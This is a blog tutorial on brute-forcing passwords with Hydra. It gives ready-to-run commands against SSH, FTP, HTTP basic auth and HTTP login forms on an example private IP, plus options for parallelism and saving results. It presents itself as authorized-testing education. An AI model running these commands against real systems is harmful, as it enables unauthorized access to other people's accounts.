Back to Homepage
Sunday 9 February 2025
45

How to Perform a Brute Force Attack with Hydra

Learn how to perform a brute force attack using Hydra, a popular password-cracking tool. Discover how to use Hydra to attack common protocols like SSH, FTP, and HTTP in controlled environments for educational purposes.

What is Hydra?

Hydra is an open-source tool widely used for brute force attacks and password cracking. It supports a wide variety of protocols and services, such as SSH, FTP, HTTP, MySQL, and more. Brute force attacks involve attempting a large number of username and password combinations until the correct credentials are found.

Note: Brute force attacks should only be conducted in controlled environments with proper authorization. Performing such tests without proper consent is illegal.

Installing Hydra

Before getting started, you need to have Hydra installed on your system. Hydra is available on most Linux distributions, such as Kali Linux, where it comes pre-installed. If you don’t have it, you can install it easily with the following commands:

Installation on Kali Linux (pre-installed): 

hydra -h

If Hydra is not installed, you can install it with: 

sudo apt update
sudo apt install hydra

Installation on Other Linux Distributions: 

sudo apt update
sudo apt install hydra

Installation on macOS (with Homebrew): 

brew install hydra

Performing a Brute Force Attack with Hydra

Hydra can attack various services. Below, we cover some of the most common ones, such as SSH and HTTP. Before performing an attack, you need a list of possible usernames and passwords. These lists are known as wordlists. You can find some in /usr/share/wordlists/ in Kali Linux or create your own.

Brute Force Attack on SSH

Suppose we want to perform a brute force attack against an SSH server at 192.168.1.100. For this example, we will use a list of usernames and passwords.

Basic SSH Attack Command: 

hydra -l user -P /path/to/wordlist.txt ssh://192.168.1.100
  • -l user: Specifies the username used in the attack.
  • -P /path/to/wordlist.txt: Specifies the path to the password list that Hydra will use.
  • ssh://192.168.1.100: Specifies the SSH protocol and the target IP or hostname.

Attack with Multiple Usernames:

If you want to test multiple usernames, you can use a username list instead of a single username. 

hydra -L /path/to/userlist.txt -P /path/to/wordlist.txt ssh://192.168.1.100
  • -L /path/to/userlist.txt: List of usernames to test.

Brute Force Attack on HTTP

Hydra can also attack web services protected by basic HTTP authentication or login forms. Below is how to perform an attack against a web page protected with basic authentication.

Basic HTTP Authentication Attack: 

hydra -l admin -P /path/to/wordlist.txt http-get://192.168.1.100/protected
  • http-get: Specifies that Hydra will make an HTTP GET request.
  • /protected: Path on the server protected by basic authentication.

Attack on an HTTP Login Form:

To attack a login form on a web page, you need to know the names of the username and password fields used in the form. You can obtain this by inspecting the page's HTML code. 

hydra -l admin -P /path/to/wordlist.txt 192.168.1.100 http-post-form "/login:user=^USER^&password=^PASS^:Login error"
  • /login: Path of the login form.
  • user=^USER^&password=^PASS^: Structure of the form with the fields that should be filled with the username and password.
  • Login error: String indicating when the login has failed.

Brute Force Attack on FTP

Hydra can also perform brute force attacks against FTP services.

Basic FTP Attack Command: 

hydra -l user -P /path/to/wordlist.txt ftp://192.168.1.100

This command attempts to log into the FTP server with the specified username and password list.

Additional Options

Hydra offers many advanced options to fine-tune brute force attacks, such as specifying the number of parallel tasks, setting timeout limits between attempts, and more.

Limiting the Number of Parallel Tasks: 

hydra -l admin -P /path/to/wordlist.txt -t 4 ssh://192.168.1.100
  • -t 4: Runs 4 tasks (attempts) in parallel, which can increase the attack speed.

Saving Results to a File: 

hydra -l admin -P /path/to/wordlist.txt ssh://192.168.1.100 -o results.txt
  • -o results.txt: Saves the results to the results.txt file.

Testing Previously Obtained Credentials

If you already have specific credentials and only want to validate them, you can use Hydra to confirm if the credentials are correct. 

hydra -l admin -p password123 ssh://192.168.1.100

In this example, we attempt to log in with the username admin and password password123.

The use of tools like Hydra for brute force attacks must be limited to testing environments or systems for which you have explicit authorization. Conducting brute force attacks without permission is illegal and can have severe legal consequences. Hydra is a powerful tool, but it should be used responsibly and ethically.

Conclusion

Hydra is a robust tool for performing brute force attacks against a wide range of services. By learning to use it correctly, you can test the security of your own systems and strengthen them against potential attacks. However, always remember that any security testing must be conducted ethically and with proper permissions.

More Information

For more details on how to use Hydra and all its advanced options, visit the official Hydra documentation.

Hashtags:
hacking hydra
Share:
Created by:
Author photo

Jorge García

Fullstack developer